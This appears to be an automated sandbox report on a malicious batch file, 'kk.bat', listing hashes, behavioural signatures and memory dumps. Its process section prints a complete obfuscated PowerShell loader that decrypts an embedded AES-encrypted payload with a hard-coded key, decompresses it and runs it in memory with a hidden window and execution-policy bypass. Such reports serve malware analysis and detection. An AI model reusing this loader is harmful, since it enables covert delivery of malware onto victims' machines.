Analysis
- max time kernel: 387s
- max time network: 397s
- platform: windows7_x64
- resource: win7-20221111-en
- resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
- submitted: 09-02-2023 14:38
Static task
static1
Behavioral task
behavioral1
Sample
kk.bat
Resource
win10-20220812-en
Behavioral task
behavioral2
Sample
kk.bat
Resource
win7-20221111-en
General
- Target: kk.bat
- Size: 182KB
- MD5: df4da1ecd4c50871a1c4315f571e4402
- SHA1: 1dbbe9b3784cf5ecdd08b27132a7e31588954865
- SHA256: 9800bef9d4936ee96d4872fb686121dd7209f8b529e9bdc833c4fe54bb68f5c8
- SHA512: 5f9e47f865c48cb1f2070d5d393a5d3494074bfe2347e07c988d06c8244dd420181c210a8ebdd54f768a64a5906d0c9e3be271d44f6e5bd32991bc2cacf85d3e
- SSDEEP: 3072:ur2RTVYk0bjRtZLlnm6Gdk8vZQfjO8KifQ6vfegRI8mlgJJ4u6A0FzfghYE:BRiltZITy8ufjLQsBUlgeMYE
Malware Config
Signatures
- Executes dropped EXE (1 IoCs)
  Processes: kk.bat.exe (PID 968)
- Loads dropped DLL (1 IoCs)
  Processes: cmd.exe (PID 1612)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes: kk.bat.exe (PID 968)
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: kk.bat.exe (PID 968), Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: cmd.exe (PID 1612) wrote to memory of kk.bat.exe (PID 968); the same event is recorded three times
Processes
- C:\Windows\system32\cmd.exe (PID 1612)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\kk.bat"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\kk.bat.exe (PID 968, child of cmd.exe)
    Command line: "kk.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $flLnL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\kk.bat').Split([Environment]::NewLine);foreach ($jhglm in $flLnL) { if ($jhglm.StartsWith(':: ')) { $uDeAm = $jhglm.Substring(3); break; }; };$dLIJD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uDeAm);$nJkwh = New-Object System.Security.Cryptography.AesManaged;$nJkwh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$nJkwh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$nJkwh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('I5NM1YScgS/1//5R8gmm/tnI3DRCjxBbFnAG0xn8rTc=');$nJkwh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mehcJXqMnXZUmnmrBD1Eeg==');$bIbyd = $nJkwh.CreateDecryptor();$dLIJD = $bIbyd.TransformFinalBlock($dLIJD, 0, $dLIJD.Length);$bIbyd.Dispose();$nJkwh.Dispose();$gJfcg = New-Object System.IO.MemoryStream(, $dLIJD);$dkGYN = New-Object System.IO.MemoryStream;$yfRSU = New-Object System.IO.Compression.GZipStream($gJfcg, [IO.Compression.CompressionMode]::Decompress);$yfRSU.CopyTo($dkGYN);$yfRSU.Dispose();$gJfcg.Dispose();$dkGYN.Dispose();$dLIJD = $dkGYN.ToArray();$qMhaY = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($dLIJD);$haTMg = $qMhaY.EntryPoint;$haTMg.Invoke($null, (, [string[]] ('')))
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\kk.bat.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
- \Users\Admin\AppData\Local\Temp\kk.bat.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
- memory/968-55-0x0000000000000000-mapping.dmp
- memory/968-57-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp
  Filesize: 8KB
- memory/968-58-0x000007FEF3900000-0x000007FEF4323000-memory.dmp
  Filesize: 10.1MB
- memory/968-60-0x00000000022E4000-0x00000000022E7000-memory.dmp
  Filesize: 12KB
- memory/968-59-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp
  Filesize: 11.4MB
- memory/968-61-0x00000000022EB000-0x000000000230A000-memory.dmp
  Filesize: 124KB
- memory/968-62-0x00000000022E4000-0x00000000022E7000-memory.dmp
  Filesize: 12KB
- memory/968-63-0x00000000022EB000-0x000000000230A000-memory.dmp
  Filesize: 124KB